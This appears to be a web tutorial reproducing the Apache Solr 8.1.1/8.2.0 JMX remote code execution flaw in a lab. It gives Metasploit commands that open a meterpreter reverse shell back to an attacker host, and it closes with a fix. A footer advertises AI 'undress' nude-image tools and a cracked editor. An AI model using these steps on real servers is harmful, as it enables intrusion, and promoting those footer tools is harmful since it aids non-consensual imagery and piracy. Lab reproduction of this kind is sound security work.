


0x00Introduction
Solr is an independent enterprise-level search application server that provides an API interface similar to Web-service. Users can submit XML files in a certain format to the search engine server through http requests to generate indexes; they can also make search requests through Http Get operations and get returned results in XML format.
This vulnerability stems from the security risk in the ENABLE_REMOTE_JMX_OPTS configuration option in the default configuration file solr.in.sh.
The ENABLE_REMOTE_JMX_OPTS="true" option exists in the built-in configuration file solr.in.sh of versions 8.1.1 and 8.2.0 of Apache Solr.
If you use the default solr.in.sh file from the affected version, then JMX monitoring will be enabled and exposed on RMI_PORT (default = 18983),
and no need to do anything Authentication. If this port is opened for inbound traffic in the firewall, anyone with network access to the Solr node will be able to access JMX and
can upload malicious code to be executed on the Solr server. This vulnerability does not affect users of Windows systems, but only affects users of some versions of Linux.
0x01 affected version
Apache Solr8.1.1 version online time: 2019-05-28
Apache Solr8.2.0 version online time: 2019- 07-25
0x02 vulnerability hazards
If the victim uses this default configuration, the JMX service will be opened on the default port 18983, and authentication will not be enabled by default. Any attacker with access to this port could exploit this vulnerability to launch an attack on the affected service and execute arbitrary code.
0x03 environment construction
Java environment and kali system, Solr 8.20
Solr 8.20 download address:
wget http:/ /archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip
Attacking machine: kali IP: 192.168.10.147
Victim machine: docker IP in Ubuntu18.6: 192.168.10.184:8983
1. Use nmap to scan the port and find that port 18983 is open
2. Use exploit/multi/misc/java_jmx_server module in Metasploit to reproduce the vulnerability
Ø use exploit/multi/misc/java_jmx_server
Ø set RHOST 192.168.10.184
Ø set RPORT 18983
Set payload: java/meterpreter/reverse_tcp
Ø set payload java/meterpreter/ reverse_tcp
Ø set LHOST 192.168.10.147
Ø set LPORT 4444
##3. Use run to execute and you will see the successful establishment Connection
0x05 Fix suggestion
Set the ENABLE_REMOTE_JMX_OPTS option in the solr.in.sh configuration file to false and restart Solr Serve.
The above is the detailed content of How to reproduce the RCE vulnerability in Apache Solr JMX service. For more information, please follow other related articles on the PHP Chinese website!

Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Hot Tools

PhpStorm Mac version
The latest (2018.2.1) professional PHP integrated development tool

MinGW - Minimalist GNU for Windows
This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.

EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function

DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software

ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment
